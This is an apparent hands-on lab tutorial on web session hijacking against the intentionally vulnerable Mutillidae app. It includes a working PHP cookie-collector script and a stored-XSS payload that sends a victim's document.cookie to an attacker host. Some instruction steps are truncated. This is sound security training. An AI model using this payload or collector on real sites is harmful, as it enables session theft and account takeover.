In this lab, you will learn about web session hijacking, which is a technique used by attackers to gain unauthorized access to a user's web session. The goal of this lab is to understand the concept of session hijacking and learn how to perform it through hands-on exercises. The lab will take you through the following steps:
In this step, you will learn about the basic concept of session hijacking.
Session hijacking, also known as cookie hijacking or session riding, is a type of attack where an attacker steals or impersonates a legitimate user's session to gain unauthorized access to web applications or websites. This is typically achieved by obtaining the user's session ID or cookie, which is used by web servers to identify and maintain user sessions.
Here's a simple analogy to understand session hijacking: Imagine you live in an apartment building, and the property management service provides you with a unique key to access your apartment. However, an attacker manages to obtain a copy of your key, allowing them to enter your apartment without your knowledge or consent. This is similar to session hijacking, where the attacker obtains your session ID or cookie and uses it to access web applications or websites as if they were you.
In this step, you will learn about the concept of sessions and how they work in web applications.
The HTTP protocol is a stateless protocol, which means that each request from a client to a server is treated as an independent transaction. Web applications, however, often require maintaining state across multiple requests, such as keeping track of user authentication and preferences. To address this issue, web applications use sessions.
A session is a temporary data storage mechanism that allows web applications to store and retrieve user-specific data across multiple requests. When a user logs in to a web application, a unique session ID is created and associated with the user's information. This session ID is typically stored in a cookie on the client-side (browser) and is sent with each subsequent request to the server.
Here's an example of how sessions work in PHP:
<?php
// Start the session
session_start();
// Store some data in the session
$_SESSION['username'] = 'john_doe';
// Retrieve data from the session
echo "Welcome, " . $_SESSION['username'];
?>In the example above, the session_start() function initializes the session. Data is stored in the session using the $_SESSION superglobal array, and it can be retrieved in subsequent requests as long as the session is active.
In this step, you will learn how to perform session hijacking using a hands-on example.
For this exercise, we will use the Mutillidae web application, which is a deliberately vulnerable web application designed for educational purposes.
http://192.168.122.102 in the browser./var/www/html/) and create a PHP file named getcookie.php with the following content:<?php
$cookie = $_GET['remote_cookie'];
$ip = getenv('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$referer = getenv('HTTP_REFERER');
$fp = fopen('cookie.txt', 'a');
fwrite($fp, "\n" . " IP: " . $ip . " \n" . " Date and Time: " . $time . "\n" . " Referer: " . $referer . "\n" . " Cookie: " . $cookie . "\n");
fclose($fp);
header("Location: http://192.168.122.102/mutillidae");
?>This script retrieves the user's cookie, IP address, timestamp, and referrer information, and stores them in a file named cookie.txt.
cookie.txt file in the same directory and change its ownership to www-data:www-data using the command chown www-data:www-data cookie.txt.service apache2 start.<SCRIPT>
document.location='http://172.17.0.1/getcookie.php?remote_cookie='+document.cookie
</SCRIPT>This code redirects the user's browser to the getcookie.php script, passing the user's cookie as a parameter.
cookie.txt file using the less cookie.txt command in the Kali container. You should see the user's cookie stored in the file.In this lab, you learned about web session hijacking, which is a technique used by attackers to gain unauthorized access to a user's web session. You explored the concepts of sessions and how they work in web applications. Additionally, you performed a hands-on session hijacking exercise using the Mutillidae web application, where you obtained a user's cookie through a persistent XSS vulnerability. Understanding session hijacking and its potential risks is crucial for ensuring the security of web applications and protecting user data.